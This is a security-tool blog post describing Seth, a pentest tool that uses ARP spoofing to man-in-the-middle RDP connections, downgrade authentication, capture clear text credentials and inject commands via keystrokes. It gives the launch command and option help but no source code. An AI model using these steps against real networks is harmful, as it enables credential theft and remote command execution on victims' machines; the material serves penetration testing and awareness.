Seth : Perform A MitM Attack & Extract Clear Text Credentials From RDP Connections

Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials.

It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).

Usage

Run it like this:

$ ./seth.sh <INTERFACE><ATTACKER IP><VICTIM IP><GATEWAY IP|HOST IP>[<COMMAND>]

Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.

The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using – currently it’s only reliable with the English US layout.

I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done.

The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately.

Also Read – KaliTorify : Transparent Proxy Through Tor For Kali Linux OS

This can be useful if you want use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:

usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]
[-j INJECT] -c CERTFILE -k KEYFILE
target_host [target_port]

RDP credential sniffer — Adrian Vollmer, SySS GmbH 2017

positional arguments:
target_host target host of the RDP service
target_port TCP port of the target RDP service (default 3389)

optional arguments:
-h, –help show this help message and exit
-d, –debug show debug information
-f, –fake-server perform a ‘fake server’ attack
-p LISTEN_PORT, –listen-port LISTEN_PORT
TCP port to listen on (default 3389)
-b BIND_IP, –bind-ip BIND_IP
IP address to bind the fake service to (default all)
-g {0,1,3,11}, –downgrade {0,1,3,11}
downgrade the authentication protocol to this (default
3)
-j INJECT, –inject INJECT
command to execute via key press event injection
-c CERTFILE, –certfile CERTFILE
path to the certificate file
-k KEYFILE, –keyfile KEYFILE
path to the key file

Video Tutorial

Requirements

  • python3
  • tcpdump
  • arpspoofarpspoof is part of dsniff
  • openssl

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

R K

Recent Posts

SpyAI : Intelligent Malware With Advanced Capabilities

SpyAI is a sophisticated form of malware that leverages advanced technologies to capture and analyze…

3 days ago

Proxmark3 : The Ultimate Tool For RFID Security And Analysis

The Proxmark3 is a versatile, open-source tool designed for radio-frequency identification (RFID) security analysis, research,…

3 days ago

Awesome Solana Security : Enhancing Program Development

The "Awesome Solana Security" collection is a comprehensive resource designed to help developers build more…

3 days ago

IngressNightmare-POCs : Understanding The Vulnerability Exploitation Flow

The "IngressNightmare" vulnerabilities, disclosed in March 2025, represent a critical set of security issues affecting…

3 days ago

AdaptixC2 : Enhancing Penetration Testing With Advanced Framework Capabilities

AdaptixC2 is an advanced post-exploitation and adversarial emulation framework designed specifically for penetration testers. It…

3 days ago

Bincrypter : Enhancing Linux Binary Security through Runtime Encryption And Obfuscation

Bincrypter is a powerful Linux binary runtime crypter written in BASH. It is designed to…

3 days ago